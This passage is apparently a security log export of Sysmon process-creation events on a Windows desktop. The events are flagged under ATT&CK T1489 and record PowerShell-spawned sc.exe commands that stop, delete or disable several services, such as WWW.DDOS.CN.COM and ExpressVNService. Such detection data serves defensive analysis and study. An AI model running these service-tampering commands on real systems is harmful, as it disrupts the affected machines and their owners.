(WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® 
Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config aspnet_staters Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.623"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010c9942e00}"",""processId"":""3992"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config aspnet_staters Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:33.226",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.573 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010b5922e00} +ProcessId: 5196 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelpSvcs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
WinHelpSvcs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.575596500Z"",""eventRecordID"":""3494"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.573\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010b5922e00}\r\nProcessId: 5196\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.573"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010b5922e00}"",""processId"":""5196"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelpSvcs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:33.154",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.483 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00109c8f2e00} +ProcessId: 1700 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WWW.DDOS.CN.COM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.486270000Z"",""eventRecordID"":""3491"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.483\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00109c8f2e00}\r\nProcessId: 1700\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:04.483"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-00109c8f2e00}"",""processId"":""1700"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WWW.DDOS.CN.COM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:32.375",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.442 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010ae8d2e00} +ProcessId: 7884 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete ExpressVNService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete ExpressVNService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.449170100Z"",""eventRecordID"":""3489"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.442\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010ae8d2e00}\r\nProcessId: 7884\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete ExpressVNService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.442"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010ae8d2e00}"",""processId"":""7884"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete ExpressVNService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:32.360",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.423 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010d18c2e00} +ProcessId: 956 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ExpressVNService 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.429694300Z"",""eventRecordID"":""3488"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.423\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010d18c2e00}\r\nProcessId: 956\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.423"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010d18c2e00}"",""processId"":""956"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ExpressVNService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:32.297",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.374 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00105d8a2e00} +ProcessId: 4768 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WebServers +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WebServers",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.380555700Z"",""eventRecordID"":""3485"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.374\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00105d8a2e00}\r\nProcessId: 4768\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WebServers\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.374"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-00105d8a2e00}"",""processId"":""4768"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WebServers"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:32.249",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:52:04.334 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010f0872e00} +ProcessId: 960 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop taskmgr1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.336670700Z"",""eventRecordID"":""3482"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.334\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010f0872e00}\r\nProcessId: 960\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
